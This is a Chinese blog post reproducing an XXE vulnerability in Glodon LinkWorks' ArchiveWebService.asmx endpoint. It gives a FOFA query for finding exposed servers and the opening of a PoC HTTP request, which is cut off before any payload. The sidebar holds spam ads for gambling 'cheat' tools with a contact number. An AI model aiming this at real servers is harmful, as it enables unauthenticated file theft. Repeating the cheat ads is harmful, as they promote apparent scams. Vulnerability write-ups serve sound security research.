广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

科技介绍“玉兔追月有挂吗”附开... 大家好,今天小编来为大家解答玉兔追月有挂吗这个问题咨询软件客服可以免费测试直接加微信(1367043...
六分钟辅助“葫芦娃通杀辅助使用... 六分钟辅助“葫芦娃通杀辅助使用”开挂(透视)辅助工具透明教程-哔哩哔哩;亲,葫芦娃通杀辅助使用这款游...
教程辅助“微信小程序家乡大贰修... 教程辅助“微信小程序家乡大贰修改器下载”开挂(透视)辅助脚本-知乎;打开点击测试直接进入微信(136...
普及知识“温常州茶苑辅助器下载... 普及知识“温常州茶苑辅助器下载”附开挂安装辅助详细教程 >>您好:软件加薇136704302信确实是...
九分钟辅助“蜀山四川破解好友版... 九分钟辅助“蜀山四川破解好友版辅助”开挂(透视)辅助下载2026新版-知乎;无需打开直接搜索加薇13...
教程辅助“hhpoker哪个俱... 教程辅助“hhpoker哪个俱乐部靠谱”开挂(透视)辅助软件-哔哩哔哩>>您好:软件加1367043...
必备教程“欢乐达人暗宝辅助”附... 必备教程“欢乐达人暗宝辅助”附开挂平台辅助详细教程欢乐达人暗宝辅助ai黑科技系统规律教程开挂技巧 1...
一分钟辅助“逍遥辅助器怎么用”... 逍遥辅助器怎么用开挂教程视频分享装挂详细步骤在当今的网络游戏中,逍遥辅助器怎么用作为一种经典的娱乐方...
教程辅助“贪玩互娱辅助”开挂(... 贪玩互娱辅助是一款专注玩家量身打造的游戏记牌类型软件,在贪玩互娱辅助这款游戏中我们可以记录下每张牌的...
玩家必看攻略“微信牵手跑胡子辅... 玩家必看攻略“微信牵手跑胡子辅助工具”附开挂平台辅助详细教程>>您好:软件加薇136704302中联...